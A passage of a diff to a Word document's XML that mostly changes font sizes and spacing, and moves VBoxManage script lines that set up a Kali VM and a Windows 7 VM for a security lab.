       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -6442,8 +7276,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>modifyvm</w:t>
@@ -6451,17 +7285,17 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --boot1 disk --boot2 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --boot1 disk --boot2 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>dvd</w:t>
@@ -6469,8 +7303,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> --boot3 none --boot4 none</w:t>
@@ -6478,43 +7312,46 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Start Kali VM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Start Windows VM</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>VBoxManage</w:t>
@@ -6522,8 +7359,8 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
@@ -6531,8 +7368,8 @@
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>startvm</w:t>
@@ -6540,17 +7377,17 @@
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $KALI_VM --type </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> $WINDOWS_7_VM --type </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>gui</w:t>
@@ -6559,51 +7396,27 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Start-Sleep 10</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
@@ -6611,33 +7424,35 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># 3. Create Windows VM for vulnerability) | +- 15min</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># 4. Finish Setup</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
@@ -6645,765 +7460,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Register VM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>createvm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --name $WINDOWS_7_VM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>ostype</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'Windows7_64' --register</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Set VM settings</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>modifyvm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>cpus</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $CPU --memory $RAM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>graphicscontroller</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vboxsvga</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vram</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $VRAM --nic1 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>natnetwork</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --nat-network1 $</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>NATNetworkName</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --clipboard-mode bidirectional --drag-and-drop bidirectional</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Add a SATA storage controller</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>storagectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --name 'SATA' --add </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>sata</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --controller </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>IntelAHCI</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --bootable on</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Add virtual disk to storage controller</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>storageattach</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>storagectl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 'SATA' --port 0 --device 0 --type </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>hdd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --medium </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'.\VDI\Windows</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 7 Ultimate SP1 (64bit).</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>vdi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Define boot order</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>modifyvm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --boot1 disk --boot2 </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>dvd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --boot3 none --boot4 none</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># Start Windows VM</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>VBoxManage</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>startvm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> $WINDOWS_7_VM --type </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>gui</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t># 4. Finish Setup</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
